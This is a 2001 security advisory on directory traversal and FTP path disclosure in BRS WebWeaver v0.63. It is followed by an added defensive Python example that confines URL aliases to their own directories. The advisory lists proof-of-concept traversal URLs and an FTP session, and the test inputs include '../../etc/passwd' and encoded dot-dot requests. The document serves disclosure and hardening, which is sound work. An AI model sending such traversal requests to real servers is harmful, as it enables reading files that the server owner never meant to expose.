From: joetesta@HUSHMAIL.COM
Date: Sat Apr 28 2001 - 18:57:20 CDT

    ----- Begin Hush Signed Message from joetesta@hushmail.com -----

    Vulnerabilities in BRS WebWeaver

        Overview

    BRS WebWeaver v0.63 is a combined FTP and web server available from
    http://bsoutham.home.dhs.org. Vulnerabilities exist in the web
    server which allow remote users to break out of the web root using
    relative paths (i.e., '..', '...'). In addition, the FTP server
    can be made to disclose the physical path of the FTP root.

        Details

    The following URLs demonstrate the problem with the web server:

            http://localhost/syshelp/../[any file outside the web root]
            http://localhost/sysimages/../[any file outside the web root]
            http://localhost/scripts/../[any file outside the web root]

    The following is an illustration of the problem with the FTP server:

    >ftp localhost
    Connected to xxxxxxxxxxxx.rh.rit.edu.
    220 BRS WebWeaver FTP Server ready.
    User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> cd *
    250 CWD command successful. "/*/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
    c:\windows\desktop\*\*.* not found
    226 File sent ok
    ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
    ftp>

        Solution

    The web server root traversal vulnerabilities can be prevented by removing
    all user-defined aliases (i.e., 'syshelp', 'sysimages') as well as the
    ISAPI/CGI alias (i.e., 'scripts'). There is no solution for the FTP root
    disclosure vulnerability.

        Vendor Status

    Blaine R Southam was contacted via <bsoutham@iname.com> on
    Saturday, April 21, 2001. No reply was received.

        - Joe Testa

    e-mail: joetesta@hushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

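The advisory's workaround is to delete the aliases; the underlying fix is to canonicalise the path after alias substitution and refuse anything outside the alias's directory. The following is an added example written for this archive page, not BRS WebWeaver code: the alias table, the directory layout and the `safe_resolve` function are constructed to model the behaviour described above.

```python
"""Hardened alias-to-path mapping (added example, not BRS WebWeaver code).

Models the alias handling described above: 'syshelp', 'sysimages' and 'scripts'
map to directories and the rest of the URL is joined on.  The fix is to
canonicalise the joined path and refuse anything outside the alias's directory.
Alias table and directory layout are constructed; the product's are not known.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/www"
ALIASES = {                      # constructed: URL prefix -> directory
    "syshelp": "/srv/www/help",
    "sysimages": "/srv/www/images",
    "scripts": "/srv/www/cgi",
}


def _dot_only(segment: str) -> bool:
    """True for '.', '..', '...', ...  Windows file APIs have historically
    collapsed dot-only names, so reject them outright instead of trusting
    normpath, which only understands '.' and '..'."""
    return bool(segment) and set(segment) == {"."}


def safe_resolve(url_path: str):
    """Canonical file path for a request, or None if it would leave the
    directory its alias (or the web root) is bound to."""
    decoded = unquote(url_path)          # decode once, validate the decoded form
    if "\x00" in decoded or "\\" in decoded:
        return None                      # NUL truncation / backslash separators
    parts = decoded.lstrip("/").split("/", 1)
    base = ALIASES.get(parts[0])
    rest = parts[1] if len(parts) > 1 else ""
    if base is None:                     # not an alias: serve from the web root
        base, rest = WEB_ROOT, decoded.lstrip("/")
    if any(_dot_only(seg) for seg in rest.split("/")):
        return None
    candidate = posixpath.normpath(posixpath.join(base, rest))
    # Containment: canonical path must be the base itself or a descendant of it.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("/syshelp/index.htm", "/syshelp/../../etc/passwd",
                "/sysimages/.../x", "/scripts/%2e%2e/cmd", "/index.htm"):
        print(f"{req:28} -> {safe_resolve(req)}")
```

Note that a request such as `/sysimages/../help/a` is refused even though it stays inside the web root: each alias is confined to its own directory, which is the property the original alias handling lacked.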